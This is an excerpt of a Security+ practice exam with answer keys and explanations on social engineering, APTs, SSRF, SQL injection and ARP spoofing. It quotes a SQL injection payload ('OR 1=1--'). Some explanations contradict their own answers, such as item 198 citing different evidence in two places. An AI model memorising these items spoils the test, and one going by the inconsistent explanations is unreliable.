This is smishing because the attack uses SMS messages to deliver a phishing link that directs recipients to a fake sign-in page, attempting to steal their credentials. Smishing is a form of social engineering that exploits the trust in text messaging and the urgency of a password expiration notice to bypass email security filters.

Exam trap

CompTIA often tests the distinction between smishing and spoofing, where candidates mistakenly choose spoofing because the SMS appears to come from the service desk, but the core attack vector is the social engineering via SMS, not just the falsified sender information.

How to eliminate wrong answers

Option B is wrong because pretexting involves fabricating a scenario (pretext) to obtain information or access, often through voice calls or impersonation, not through SMS with a malicious link. Option C is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area, not a digital or messaging-based attack. Option D is wrong because spoofing refers to falsifying data (e.g., IP address, email header, caller ID) to impersonate a trusted source, but the attack described is specifically a social engineering technique using SMS, which is classified as smishing, not just spoofing.

197
MCQmedium

A security analyst discovers that an attacker maintained persistent access to a corporate network for six months, moving laterally between systems and exfiltrating sensitive data. The attacker used custom malware that evaded antivirus and established multiple backdoors. Which of the following best describes this type of threat actor and their campaign?

A.Insider threat
B.Advanced persistent threat (APT)
C.Zero‑day exploit
D.Denial of service (DoS) attack
AnswerB

APT correctly describes a threat actor that establishes a long‑term presence, uses custom malware, and conducts lateral movement and data exfiltration—all of which are present in the scenario. APTs are designed to remain undetected while achieving strategic goals over months or years.

Why this answer

The scenario describes a threat actor that maintained stealthy, long-term access to a network, moved laterally, and exfiltrated data over six months using custom malware that evaded antivirus. This aligns with the definition of an Advanced Persistent Threat (APT), which is a sophisticated, well-resourced adversary that conducts prolonged, targeted campaigns to achieve specific objectives, often espionage or data theft.

Exam trap

The trap here is that candidates may confuse 'advanced persistent threat' with a specific exploit technique like a zero-day, or assume any long-term access is an insider threat, but the key differentiator is the external, resource-intensive, and stealthy nature of the campaign described.

How to eliminate wrong answers

Option A is wrong because an insider threat originates from within the organization (e.g., a disgruntled employee or contractor) and typically does not require custom malware that evades antivirus or multiple backdoors for lateral movement over six months; the scenario describes external-style persistence and evasion. Option C is wrong because a zero-day exploit refers to a specific, previously unknown vulnerability used in an attack, not the overall campaign or threat actor type; the question asks for the description of the threat actor and their campaign, not the exploit method. Option D is wrong because a Denial of Service (DoS) attack aims to disrupt availability of services, not to maintain persistent access, move laterally, or exfiltrate data; it is a different attack objective entirely.

198
MCQhard

Based on the exhibit, which vulnerability is being exploited?

A.Cross-site scripting (XSS)
B.Cross-site request forgery (CSRF)
C.Authentication bypass
D.Command injection
AnswerC

The backend is trusting client-influenced headers and a forwarded path value to reach an administrative endpoint. The logs show a normal analyst account reaching /admin/export after supplying X-Original-URL, which indicates the application or proxy is failing to enforce access controls consistently. That is an authentication or authorization bypass caused by trusting data the client can manipulate.

Why this answer

The exhibit shows a URL parameter `?admin=false` being changed to `?admin=true`, which directly toggles an administrative access control flag. This is a classic authentication bypass vulnerability because the application trusts client-supplied input to determine authorization status, allowing an attacker to escalate privileges without valid credentials.

Exam trap

The trap here is that candidates confuse parameter manipulation for privilege escalation with CSRF, but CSRF requires an authenticated victim to unknowingly submit a request, whereas this attack directly alters the authorization flag without needing another user's session.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) requires injecting malicious scripts into web pages, not manipulating URL parameters to gain admin access. Option B is wrong because cross-site request forgery (CSRF) tricks a user into performing unintended actions using their existing session, but does not involve directly modifying a parameter to bypass authentication. Option D is wrong because command injection involves injecting OS commands into input fields that are executed by the server, not altering a boolean parameter in a URL to change authorization state.

199
MCQmedium

An EDR alert shows a Windows workstation used certutil.exe to download an encoded script, then created a scheduled task named UpdateCheck that runs every 15 minutes. The machine is also making short HTTPS connections to the same external IP. What is the best description of what the attacker is doing?

A.A buffer overflow exploit is likely corrupting memory in the operating system.
B.Living-off-the-land abuse with persistence through a scheduled task is occurring.
C.The evidence most strongly suggests a drive-by download from a compromised browser session.
D.A man-in-the-middle attack is intercepting and modifying the TLS session.
AnswerB

The attacker is using legitimate system utilities, such as certutil.exe and the Windows task scheduler, to download, execute, and persist malicious code. That pattern strongly suggests living-off-the-land abuse rather than a custom malware loader. The recurring outbound HTTPS traffic to a single external host also fits command-and-control activity. This combination is common when attackers want to blend in with normal administrative behavior and survive reboots without dropping obvious binaries.

Why this answer

Option B is correct because the attacker is using certutil.exe, a native Windows tool, to download an encoded script (living-off-the-land), and then creating a scheduled task named UpdateCheck to maintain persistence by running every 15 minutes. This combination of abusing trusted binaries and establishing a recurring task is a classic indicator of LOTL abuse with persistence.

Exam trap

The trap here is that candidates may confuse the use of a native tool like certutil.exe with a buffer overflow or drive-by download, failing to recognize the living-off-the-land technique and persistence via scheduled tasks as the core indicators.

How to eliminate wrong answers

Option A is wrong because a buffer overflow exploit corrupts memory to execute arbitrary code, but the evidence shows no memory corruption or exploitation—just the use of certutil.exe and scheduled tasks. Option C is wrong because a drive-by download typically involves a browser exploit or malicious script executed via a compromised website, whereas here the attacker actively used certutil.exe to download a script and created a scheduled task, indicating post-exploitation activity rather than initial infection. Option D is wrong because a man-in-the-middle attack would intercept or modify TLS sessions, but the evidence only shows short HTTPS connections to an external IP, which is consistent with command-and-control traffic, not TLS interception or modification.

200
MCQeasy

Threat intelligence shows an attacker changes domains every day, but the malware file itself stays the same across incidents. Which indicator would be the best to block immediately if you find it in your environment?

A.The current weather in the city where the attack was observed
B.The malware file hash from the shared sample
C.The logo used on the phishing email
D.The time zone used by the help desk
AnswerB

A file hash can directly identify the same malware sample even when the attacker rotates domains and hosting infrastructure.

Why this answer

The malware file hash (e.g., MD5, SHA-1, or SHA-256) is a unique fingerprint of the file's binary content. Since the malware file itself remains unchanged across incidents, its hash is a static, reliable indicator of compromise (IoC) that can be immediately blocked via file reputation or hash-based detection rules, regardless of domain changes.

Exam trap

The trap here is that candidates may focus on the attacker's changing domains (a dynamic indicator) and overlook the static file hash, which is the most reliable and immediately actionable indicator when the malware binary is unchanged.

How to eliminate wrong answers

Option A is wrong because the current weather is an environmental variable unrelated to the malware's identity or behavior; it has no forensic value as a static indicator. Option C is wrong because a phishing email logo is a visual element that can be easily altered or reused by different threat actors, and it does not uniquely identify the malware file itself. Option D is wrong because the help desk time zone is an operational parameter of the organization, not an indicator of compromise; it provides no information about the attacker's tools or tactics.

201
MCQeasy

Employees in a lobby say their phones automatically connected to a wireless network named CorpWiFi, even though the legitimate access point was offline. They were then shown a fake sign-in page. What threat is this?

A.An evil twin access point impersonating the real corporate wireless network
B.A Bluetooth replay attack that reuses captured pairing data
C.A cloud misconfiguration exposing a storage bucket to the internet
D.A dependency compromise in a software library used by the company portal
AnswerA

An evil twin is a rogue access point that copies a trusted SSID to lure users into connecting.

Why this answer

This is an evil twin attack. The attacker sets up a rogue access point broadcasting the same SSID (CorpWiFi) as the legitimate network. When the real access point goes offline, client devices automatically connect to the stronger signal of the rogue AP, allowing the attacker to present a fake captive portal to harvest credentials.

Exam trap

The trap here is that candidates may confuse an evil twin with a rogue access point, but the key distinction is that an evil twin specifically impersonates a legitimate SSID to trick clients into connecting, whereas a rogue AP is simply an unauthorized device on the network.

How to eliminate wrong answers

Option B is wrong because a Bluetooth replay attack involves capturing and retransmitting Bluetooth pairing packets to gain unauthorized access, not connecting to a Wi-Fi network or presenting a fake sign-in page. Option C is wrong because a cloud misconfiguration exposing a storage bucket would allow unauthorized data access via the internet, not cause phones to auto-connect to a rogue Wi-Fi network. Option D is wrong because a dependency compromise in a software library would affect the company portal's code execution or data integrity, not involve wireless network impersonation or captive portal phishing.

202
MCQhard

An accounts payable clerk receives an email that appears to continue an existing thread with a shipping vendor. The sender name, signature block, and invoice number all match a real open order, and the message asks the clerk to use a "new payment portal" and confirm bank details before 3 PM to avoid delayed shipment. The email contains no attachments and only one URL. Which attack type is most likely?

A.Spear phishing, because the email uses targeted business context and time pressure.
B.Pretexting, because the attacker is impersonating a trusted vendor to create a believable reason for the request.
C.Smishing, because the attacker is using a text message to reach the victim.
D.Baiting, because the attacker is offering a portal link that appears helpful to the recipient.
AnswerB

Pretexting is the best fit because the attacker builds a believable story around a trusted vendor relationship and asks for a sensitive business action. The value is in the fabricated scenario, not just the delivery channel. The realistic invoice details and urgency support the pretext, which is a common pattern in payment-change scams and business email compromise.

Why this answer

Option B is correct because the attacker is not just sending a generic targeted email but is actively impersonating a trusted vendor and fabricating a scenario (the need to use a new payment portal to avoid shipment delay) to manipulate the victim into divulging sensitive bank details. This aligns with pretexting, where the attacker creates a false pretext (a believable reason) to obtain information, rather than relying on malicious attachments or links alone. The email's use of an existing thread, matching sender details, and time pressure all support the pretext, making it a classic impersonation-based social engineering attack.

Exam trap

The trap here is that candidates often confuse pretexting with spear phishing because both involve targeted emails, but the key distinction is that pretexting relies on a fabricated scenario to manipulate the victim into action, whereas spear phishing typically uses a malicious link or attachment to compromise the system directly.

How to eliminate wrong answers

Option A is wrong because spear phishing typically involves a targeted email with a malicious payload (e.g., a link to a credential-harvesting site or an attachment with malware), but here the attack relies on the fabricated scenario and impersonation to trick the victim into voluntarily providing bank details, not on exploiting a technical vulnerability via a link. Option C is wrong because smishing specifically refers to SMS text message attacks, not email-based attacks. Option D is wrong because baiting involves offering something enticing (e.g., a free download or USB drive) to lure the victim into a trap, whereas this attack uses a fabricated reason (pretext) to request sensitive information, not an offer of a helpful portal link.

203
MCQmedium

A file-conversion API accepts a URL to generate a preview image. An attacker submits a URL for the cloud metadata service at 169.254.169.254 and receives instance credentials in the preview output. What attack is this?

A.SQL injection
B.Server-side request forgery
C.Cross-site request forgery
D.Command injection
AnswerB

Server-side request forgery occurs when an attacker tricks a server into making an unintended request to an internal or privileged resource.

Why this answer

The attack is Server-Side Request Forgery (SSRF) because the attacker manipulates the file-conversion API into making an outbound HTTP request to an internal IP address (169.254.169.254, the cloud metadata service). The API then returns the metadata (including instance credentials) in the generated preview image, exploiting the server's trust to access internal resources that are not directly accessible from the internet.

Exam trap

The trap here is that candidates confuse SSRF with CSRF because both involve 'request forgery,' but SSRF targets server-side requests to internal resources, while CSRF targets user-side requests to perform unauthorized actions.

How to eliminate wrong answers

Option A is wrong because SQL injection involves injecting malicious SQL queries into input fields to manipulate a database, not making the server request internal URLs. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks an authenticated user's browser into performing unwanted actions on a trusted site, not exploiting server-side URL fetching. Option D is wrong because command injection involves injecting operating system commands into input that is executed by the server, not manipulating URL requests to internal services.

204
Multi-Selecteasy

An employee reports a suspicious email that appears to be from the help desk. Which two details are the strongest signs of phishing? Select two.

Select 2 answers
A.The message creates urgency and threatens account suspension within 15 minutes.
B.The sender address uses a look-alike domain with one letter changed.
C.The email signature includes the company logo and a professional font.
D.The message was delivered during normal business hours.
E.The subject line includes the employee's department name.
AnswersA, B

Urgent pressure is a common social engineering tactic used to stop the user from verifying the request carefully.

Why this answer

Option A is correct because creating a false sense of urgency, such as threatening account suspension within 15 minutes, is a classic social engineering tactic used in phishing to bypass rational thinking and prompt immediate action. This exploits the recipient's fear of losing access, which is a psychological trigger rather than a technical indicator, but it is one of the strongest behavioral signs of a phishing attempt.

Exam trap

The trap here is that candidates often focus on technical indicators like sender address or domain spoofing (Option B) as the strongest sign, but the exam emphasizes that urgency and threats are equally strong behavioral red flags, and both A and B are correct in this question.

205
MCQmedium

A vulnerability scan finds that an administrative SSH service on a Linux server is listening on 0.0.0.0 and is reachable from the internet. The server is meant to be managed only from the internal admin subnet. What is the best remediation?

A.Patch the SSH client on administrator laptops so the server cannot be reached externally.
B.Restrict SSH to the management network and block public access with firewall or host-based rules.
C.Enable a captive portal on the public interface so only authenticated users see the service.
D.Replace SSH with FTP because FTP can be configured to allow administrative access more easily.
AnswerB

Limiting the service to the internal management subnet removes unnecessary exposure and aligns with least exposure and secure administration practices.

Why this answer

Option B is correct because the vulnerability is that SSH is exposed to the internet on 0.0.0.0, which violates the principle of least privilege and exposes the administrative interface to unauthorized access. The best remediation is to restrict SSH to the internal management subnet using firewall rules (e.g., iptables, security group ACLs) or host-based rules (e.g., tcpwrappers, /etc/hosts.allow), ensuring only trusted internal IPs can reach the service. This directly addresses the exposure without changing the protocol or client configuration.

Exam trap

The trap here is that candidates may think patching the client (Option A) or adding authentication (Option C) solves the exposure, but the core issue is network-level access control—no amount of client-side patching or portal authentication can prevent an attacker from reaching the open SSH port from the internet.

How to eliminate wrong answers

Option A is wrong because patching the SSH client on administrator laptops does nothing to prevent external attackers from reaching the server; the server is still listening on 0.0.0.0 and accessible from the internet. Option C is wrong because a captive portal is a web-based authentication mechanism typically used for guest networks, not for securing an SSH service; SSH does not support captive portal redirection, and this would not prevent direct TCP access to port 22. Option D is wrong because FTP transmits credentials and data in cleartext by default, which is far less secure than SSH; replacing SSH with FTP would increase the attack surface and violate security best practices for administrative access.

206
MCQmedium

A security analyst discovers that an organization's web application is vulnerable to SQL injection. The application uses a legacy database driver that does not support parameterized queries. Which of the following is the BEST mitigation to prevent this vulnerability?

A.Implement a web application firewall (WAF) to filter malicious input.
B.Update the database driver to a version that supports parameterized queries.
C.Encode all user input using HTML encoding.
D.Disable error messages that reveal database schema.
AnswerB

Parameterized queries ensure that user input is treated as data, not executable code, which is the definitive prevention for SQL injection. Updating the driver to support this is the best long-term mitigation.

Why this answer

Option B is correct because the root cause of the SQL injection vulnerability is the legacy database driver that does not support parameterized queries. Updating the driver to a modern version that supports parameterized queries (also known as prepared statements) allows the application to separate SQL logic from user-supplied data, effectively preventing SQL injection at the database layer. This addresses the fundamental flaw rather than relying on external filtering or encoding.

Exam trap

The trap here is that candidates often choose a WAF (Option A) as a quick fix, overlooking that it only mitigates symptoms rather than eliminating the root cause, which is the lack of parameterized query support in the database driver.

How to eliminate wrong answers

Option A is wrong because implementing a web application firewall (WAF) is a compensating control that filters malicious input based on signatures or heuristics, but it can be bypassed with obfuscated payloads and does not fix the underlying insecure code. Option C is wrong because HTML encoding is designed to prevent cross-site scripting (XSS) by neutralizing HTML special characters, not SQL injection; it does not prevent an attacker from injecting SQL commands into database queries.

207
Multi-Selecthard

Threat intelligence reports a campaign that rotates domains daily and repacks the malware for each delivery. Analysts also observe the same TLS certificate fingerprint, the same mutex name, and the same JA3 client fingerprint across multiple samples. Which three indicators are most useful to prioritize for hunting or blocking? Select three.

Select 3 answers
A.The TLS certificate fingerprint reused by multiple samples.
B.The mutex name created by the malware on infected endpoints.
C.The JA3 client fingerprint observed in outbound TLS sessions.
D.The current domain name used by the command-and-control server.
E.The public IP address currently hosting the malware sample.
AnswersA, B, C

A reused certificate fingerprint is harder for attackers to change quickly than a daily domain. It can identify infrastructure or tooling reused across campaigns. Because it appears across multiple samples, it is a durable hunting and blocking indicator compared with short-lived hostnames.

Why this answer

The TLS certificate fingerprint is a reliable indicator because it is derived from the certificate's public key and metadata, which remain static even when the malware's domain or IP address changes. Since the threat intelligence report states the same fingerprint is reused across multiple samples, this provides a stable, immutable identifier that can be used to detect or block malicious TLS handshakes regardless of domain rotation.

Exam trap

CompTIA often tests the concept that dynamic indicators like domains and IPs are less reliable for persistent detection compared to static artifacts such as cryptographic fingerprints or mutex names, which remain constant despite infrastructure changes.

208
MCQeasy

Analysts see a malware campaign that changes its command-and-control domain every day, but the executable hash and a unique registry value remain the same across incidents. Which indicator is the best candidate for hunting?

A.The daily domain name used for command and control.
B.The executable hash from the malware sample.
C.The employee's home city where the alert was observed.
D.The brand of the user's keyboard and mouse.
AnswerB

A stable hash is a strong, specific indicator when the malware file itself remains unchanged.

Why this answer

Option B is correct because the executable hash (e.g., SHA-256) and the unique registry value are static, immutable artifacts that persist across every incident, regardless of the daily domain rotation. These indicators are far more reliable for hunting since they directly identify the malware binary itself, whereas the domain changes frequently and may be blocked or sinkholed after detection.

Exam trap

The trap here is that candidates focus on the changing domain (a dynamic indicator) because it is directly observable in network traffic, but the exam tests the understanding that static indicators (like the hash) are more persistent and effective for hunting across multiple incidents.

How to eliminate wrong answers

Option A is wrong because the daily domain name is a volatile indicator that changes every day, making it unreliable for long-term hunting; it would require constant updates and may already be taken down by the time it is used. Option C is wrong because the employee's home city is a geographic attribute unrelated to the malware's technical characteristics and cannot be used to identify or track the specific malware campaign. Option D is wrong because the brand of the user's keyboard and mouse is a hardware peripheral detail that has no bearing on the malware's behavior or persistence, and it is not a valid indicator of compromise.

209
MCQmedium

An administrator notices that a finance file share remained normal for weeks after a former contractor left the company. This morning, multiple PDFs and spreadsheets were deleted, and a scheduled task created months ago is now executing a script that wipes files in the shared folder. Which malware type is most consistent with this behavior?

A.Logic bomb triggered by a time or condition after being planted earlier
B.Worm that is automatically propagating to other endpoints
C.Spyware that is secretly collecting keystrokes and screenshots
D.Rootkit that is hiding itself in the kernel to maintain stealth
AnswerA

A logic bomb is the best fit because malicious code was planted earlier and remained dormant until a trigger condition caused it to execute. The scheduled task and delayed destructive action are classic signs of a hidden payload designed to activate later, sometimes after a user departure, date, or system event. The time gap strongly supports this interpretation.

Why this answer

The behavior matches a logic bomb: malicious code planted in advance (the scheduled task created months ago) that remains dormant until triggered by a specific condition (the passage of time or a date). The file share was normal for weeks because the logic bomb had not yet met its trigger condition; once triggered, it executed the script to delete files. This contrasts with other malware types that require active propagation, continuous monitoring, or kernel-level hiding.

Exam trap

The trap here is that candidates may confuse a logic bomb with a worm because both can cause widespread damage, but the key distinction is the pre-planted, dormant nature of the logic bomb versus the active self-propagation of a worm.

How to eliminate wrong answers

Option B is wrong because a worm self-propagates across networks without user intervention, but here the malware was planted as a scheduled task months ago and only activated recently, with no evidence of lateral movement or replication. Option C is wrong because spyware focuses on covert data collection (keystrokes, screenshots) and does not typically delete files or execute destructive scripts via scheduled tasks. Option D is wrong because a rootkit hides its presence by modifying the OS kernel or system calls, whereas the described behavior involves a visible scheduled task and file deletion without any stealth mechanisms.

210
MCQmedium

An API log shows repeated requests such as `GET /api/orders?orderId=105%20OR%201=1--` followed by responses containing many customers' order records instead of one record. Which attack is most likely?

A.SQL injection, because the attacker is altering the database query through crafted input.
B.Cross-site scripting, because malicious code is being reflected in the browser.
C.Cross-site request forgery, because the request appears to be an unauthorized action.
D.Broken access control, because the API is not validating the user role correctly.
AnswerA

The injected condition `OR 1=1--` is a classic indicator that user input is being interpreted as part of a database query. The application returns too much data because the attacker has manipulated the SQL logic.

Why this answer

The request includes `%20OR%201=1--`, which URL-decodes to ` OR 1=1--`. This is a classic SQL injection payload that appends a tautology (`OR 1=1`) and comments out the rest of the query (`--`). The API log shows that instead of returning a single order record, the response contains many customers' order records, confirming that the injected condition bypassed the intended WHERE clause and returned all rows from the orders table.

Exam trap

The trap here is that candidates may see the word 'API' and assume the attack is related to access control or CSRF, but the presence of SQL comment syntax (`--`) and the tautology (`OR 1=1`) in the request parameter is the definitive indicator of SQL injection.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into a web page viewed by other users, not altering database queries to retrieve unauthorized data. Option C is wrong because cross-site request forgery (CSRF) tricks an authenticated user into performing an unintended action, but the log shows direct crafted input in the API request, not a forged request from another site. Option D is wrong because broken access control would involve missing or flawed authorization checks on the API endpoint, but the attack here exploits a database-level injection vulnerability, not a failure to validate user roles or permissions.

211
MCQhard

A SaaS dashboard invalidates passwords after a forced reset, but a stolen bearer token from a browser cookie still works from a VPN exit node for several hours. SIEM logs show the same token value used from two countries within five minutes, and no MFA prompt appears because the token is already accepted. What attack is most likely?

A.Session hijacking, because a valid session token is being replayed from a different location.
B.Credential stuffing, because the attacker used many passwords against the portal.
C.Cross-site request forgery, because the attacker is making requests on behalf of the user.
D.Phishing, because the attacker likely stole the user's password first.
AnswerA

Session hijacking is the best answer because the attacker is reusing a valid authenticated token rather than logging in normally. The token continues to work after a password reset, and the same token appears from different geographies in a short window. That strongly suggests the session itself was stolen and replayed, which bypasses authentication controls that only protect the login step.

Why this answer

Option A is correct because the scenario describes a stolen bearer token (session token) being reused from a different geographic location (VPN exit node) without re-authentication. This is classic session hijacking, where an attacker captures a valid session token (e.g., from a browser cookie) and replays it to impersonate the authenticated user. The fact that the token works even after a password reset and bypasses MFA confirms the attack is session hijacking, not credential theft or request forgery.

Exam trap

The trap here is that candidates confuse session hijacking with CSRF, but CSRF requires the victim's browser to send the request, whereas session hijacking involves the attacker directly using the stolen token from their own machine.

How to eliminate wrong answers

Option B is wrong because credential stuffing involves using many stolen username/password pairs against a login portal, but here the attacker already has a valid bearer token and does not need to guess passwords. Option C is wrong because cross-site request forgery (CSRF) tricks a user's browser into making unintended requests using their existing session, but the attacker here is directly using a stolen token from a different location, not exploiting the user's active session.

212
MCQeasy

A person wearing a contractor badge asks reception to let them into the office because they forgot their access card and say they are expected for a server maintenance visit. What social engineering technique is most likely?

A.Pretexting
B.Baiting
C.Smishing
D.Ransomware
AnswerA

Pretexting uses a fabricated story or identity to gain trust and access. In this case, the person invents a maintenance visit and forgotten badge story to convince reception to grant entry.

Why this answer

Pretexting is correct because the attacker creates a fabricated scenario (the 'pretext') of being a contractor on a server maintenance visit to gain unauthorized physical access. The use of a contractor badge and the claim of a forgotten access card are designed to exploit the receptionist's trust and willingness to help, bypassing security controls without technical hacking.

Exam trap

Cisco often tests the distinction between pretexting (fabricated scenario) and baiting (offering a lure), where candidates mistakenly choose baiting because they associate the 'forgotten card' with a 'bait' like a free item, but the core technique is the false identity and story.

How to eliminate wrong answers

Option B (Baiting) is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to trick a victim into performing an action, not fabricating a story for access. Option C (Smishing) is wrong because smishing is a form of phishing conducted via SMS text messages, not an in-person social engineering technique involving a badge and verbal request.

213
Multi-Selectmedium

A help desk technician receives a phone call from someone claiming to be the VP of Finance. The caller says they are in an airport, forgot their phone, and need a password reset immediately. They also ask the technician to skip callback verification because a meeting starts in five minutes. Which two details are the strongest indicators of a pretexting or vishing attempt? Select two.

Select 2 answers
A.the caller claims an executive title and uses authority to pressure the technician
B.the call is routed through the company ticketing system with an approved change record
C.the caller asks the technician to bypass identity verification and callback procedures
D.the caller answers all security questions correctly after being prompted for them
E.the call occurs after normal business hours on a holiday weekend
AnswersA, C

Impersonating a senior executive is a common social engineering tactic because it creates authority pressure and makes the target more likely to comply quickly. In a help desk context, attackers often borrow a title that sounds urgent and important. That pressure is a strong sign the call may be a pretext rather than a legitimate request.

Why this answer

Option A is correct because the caller's use of an executive title (VP of Finance) and urgent authority pressure is a classic social engineering tactic known as pretexting. In a vishing (voice phishing) attack, the attacker fabricates a scenario to manipulate the technician into bypassing standard security procedures. This aligns with the SY0-701 domain on threats, vulnerabilities, and mitigations, specifically social engineering techniques.

Exam trap

The trap here is that candidates may confuse a successful security question response (Option D) as a sign of legitimacy, but in vishing attacks, attackers often gather personal data from OSINT or data breaches to answer such questions, making it a weak indicator compared to the direct authority pressure and request to bypass verification.

214
MCQeasy

A help desk technician receives a phone call from someone claiming to be a contractor. The caller says their MFA app was lost, asks the technician to enroll a new device immediately, and pressures them to ignore policy. What type of attack is this?

A.Phishing
B.Vishing
C.Smishing
D.Baiting
AnswerB

Vishing uses voice calls to pressure a target into revealing information or changing security settings.

Why this answer

This is a vishing (voice phishing) attack because the attacker uses a phone call to impersonate a contractor and socially engineer the technician into bypassing MFA enrollment policies. Vishing specifically exploits voice communication to manipulate victims, unlike phishing which uses email or malicious links.

Exam trap

The trap here is confusing vishing with phishing because both involve social engineering, but the key differentiator is the communication medium—voice (phone call) vs. electronic message (email/SMS).

How to eliminate wrong answers

Option A is wrong because phishing involves deceptive emails or messages with malicious links/attachments, not a direct phone call. Option C is wrong because smishing uses SMS text messages to trick victims, not voice calls. Option D is wrong because baiting relies on offering something enticing (e.g., a free USB drive) to lure victims into a trap, not a phone-based social engineering request.

215
MCQhard

Based on the exhibit, which finding should be remediated first?

A.Finding A
B.Finding B
C.Finding C
D.Finding D
AnswerA

Finding A combines internet exposure, remote code execution, and active exploitation in the wild, making it the most urgent risk even if another item has a slightly higher CVSS score. Exposure and exploitability matter more than score alone. A patch is available, so remediation can reduce the window of opportunity quickly. In Security+ style prioritization, reachable, actively exploited weaknesses on public-facing systems rise to the top.

Why this answer

Finding A indicates a critical vulnerability with a CVSS score of 9.8, which is the highest severity among the findings. Remediation should prioritize the most severe risk to minimize potential impact, as this vulnerability could allow remote code execution without authentication.

Exam trap

The trap here is that candidates might choose a finding based on the number of affected systems or a misleading description, rather than strictly prioritizing by CVSS severity score as CompTIA expects.

How to eliminate wrong answers

Option B is wrong because its CVSS score of 7.5 is lower than Finding A's 9.8, and while it represents a high-severity issue, it does not pose the same immediate risk of unauthenticated remote compromise. Option C is wrong because it has a CVSS score of 6.2, which is medium severity, and typically involves a local attack vector or requires user interaction, making it less urgent than a critical remote exploit. Option D is wrong because its CVSS score of 4.3 is low severity, often related to information disclosure or minor misconfigurations, and should be addressed after critical and high-severity findings.

216
MCQmedium

A security analyst observes repeated outbound traffic from a single workstation to a known malicious IP address. The workstation's anti-malware software has reported no alerts, and the user claims to have only downloaded software from the company's approved application store. Which type of malware most likely explains this behavior?

A.Ransomware
B.Rootkit
C.Trojan horse
D.Polymorphic malware
AnswerC

Correct. A Trojan horse masquerades as benign software, often from a seemingly trusted source. It can evade signature-based anti-malware and silently establish outbound connections to a malicious IP for command-and-control, data exfiltration, or further payload delivery.

Why this answer

The Trojan horse is correct because it is a type of malware that disguises itself as legitimate software, often downloaded from trusted sources like an approved application store, to bypass security controls. Once installed, it can silently establish outbound connections to a command-and-control (C2) server, such as the known malicious IP address observed, without triggering anti-malware alerts if the Trojan is not yet in the signature database. This matches the scenario where the user downloaded from an approved store, the anti-malware reported no alerts, and the workstation is communicating with a malicious IP.

Exam trap

The trap here is that candidates may confuse a rootkit's stealth capabilities with the Trojan's social engineering vector, overlooking that the approved store download is a classic Trojan delivery method, not a rootkit's typical infection path.

How to eliminate wrong answers

Option A is wrong because ransomware typically announces its presence with a ransom note and encryption of files, not by silently generating repeated outbound traffic to a malicious IP without alerts. Option B is wrong because a rootkit is designed to hide its presence by modifying the operating system kernel or drivers, which would likely evade anti-malware detection but does not inherently explain the user downloading from an approved store; rootkits are usually installed via exploits or bundled with other malware, not typically disguised as a legitimate app from an approved store.

217
MCQmedium

Several users on the same subnet report intermittent inability to reach the default gateway. A packet capture shows ARP replies mapping the gateway IP to a different MAC address, and the same host keeps sending those replies every few seconds. What attack is most likely?

A.Replay attack
B.ARP spoofing
C.DNS amplification
D.Man-in-the-middle via TLS downgrade
AnswerB

ARP spoofing, also called ARP poisoning, forges ARP replies so hosts associate the gateway IP with the attacker MAC address.

Why this answer

The correct answer is B, ARP spoofing. The symptoms—intermittent gateway unreachability, ARP replies mapping the gateway IP to a different MAC address, and repeated unsolicited ARP replies—are classic indicators of an ARP spoofing (also called ARP poisoning) attack. The attacker sends forged ARP replies to associate their own MAC address with the gateway IP, causing traffic destined for the gateway to be sent to the attacker instead, disrupting connectivity.

Exam trap

The trap here is that candidates may confuse ARP spoofing with a man-in-the-middle attack in general, but the question specifically describes ARP-level manipulation (forged ARP replies mapping the gateway IP to a different MAC), which is the defining characteristic of ARP spoofing, not a TLS downgrade or replay attack.

How to eliminate wrong answers

Option A is wrong because a replay attack involves capturing and retransmitting valid data packets (e.g., authentication tokens) to trick a system, not sending forged ARP replies to redirect traffic. Option C is wrong because a DNS amplification attack is a type of DDoS that uses open DNS resolvers to flood a target with large DNS responses, and it does not involve manipulating ARP tables or causing intermittent gateway reachability. Option D is wrong because a man-in-the-middle via TLS downgrade attack forces a connection to use a weaker TLS version or cipher, but it does not involve ARP spoofing or sending forged ARP replies; it operates at the transport/application layer, not the data link layer.

218
MCQeasy

A worker receives a text message from someone claiming to be the company's HR partner. The message says a benefits portal issue will be fixed only if the worker clicks a link and logs in right away. What type of attack is this most likely?

A.Smishing, because the attack is delivered by text message.
B.Watering hole, because the attacker compromised the HR partner's website.
C.Spoofing only, because the attacker copied the HR logo in the message.
D.Port scanning, because the attacker wants to find open services on the phone.
AnswerA

Smishing is phishing through SMS or similar text messaging, often using urgency and a trusted name to steal credentials or redirect victims.

Why this answer

This is smishing because the attack vector is a text message (SMS) that attempts to trick the recipient into clicking a malicious link and providing credentials. Smishing is a form of social engineering that exploits the trust in SMS communications, often impersonating a legitimate entity like HR to create urgency. The goal is credential theft, not technical exploitation of the phone's services.

Exam trap

CompTIA often tests the distinction between the delivery method (SMS = smishing) and the underlying technique (spoofing), so candidates mistakenly choose 'spoofing only' because they see a faked logo or sender ID, ignoring that the attack is defined by its vector.

How to eliminate wrong answers

Option B is wrong because a watering hole attack compromises a website frequently visited by the target group, not by sending a direct text message; the attacker does not compromise the HR partner's website here. Option C is wrong because spoofing alone is a technique (e.g., faking the sender ID or logo), but the full attack is smishing, which includes the social engineering delivery via SMS; the question asks for the attack type, not just one component. Option D is wrong because port scanning is a network reconnaissance technique to find open ports and services, not a method to trick a user into clicking a link via text message.

219
MCQmedium

A security analyst is investigating a phishing campaign that specifically targets senior executives in a company. The emails appear to come from the CEO and request urgent wire transfers to a fraudulent account. Which of the following best describes this type of attack?

A.Whaling
B.Spear phishing
C.Vishing
D.Pharming
AnswerA

Correct. Whaling specifically targets senior executives or high-value individuals within an organization, often using urgent or authoritative requests to trick them into transferring money or revealing sensitive information.

Why this answer

This attack is whaling because it specifically targets senior executives (the 'big fish') with a fraudulent email impersonating the CEO to request urgent wire transfers. Whaling is a form of phishing that focuses on high-profile individuals within an organization, leveraging their authority and access to sensitive financial operations. The attack exploits the trust and urgency associated with executive communications to bypass standard security controls.

Exam trap

CompTIA often tests the distinction between whaling and spear phishing, where candidates mistakenly choose spear phishing because they overlook that whaling is a specific subtype targeting executives, not just any individual.

How to eliminate wrong answers

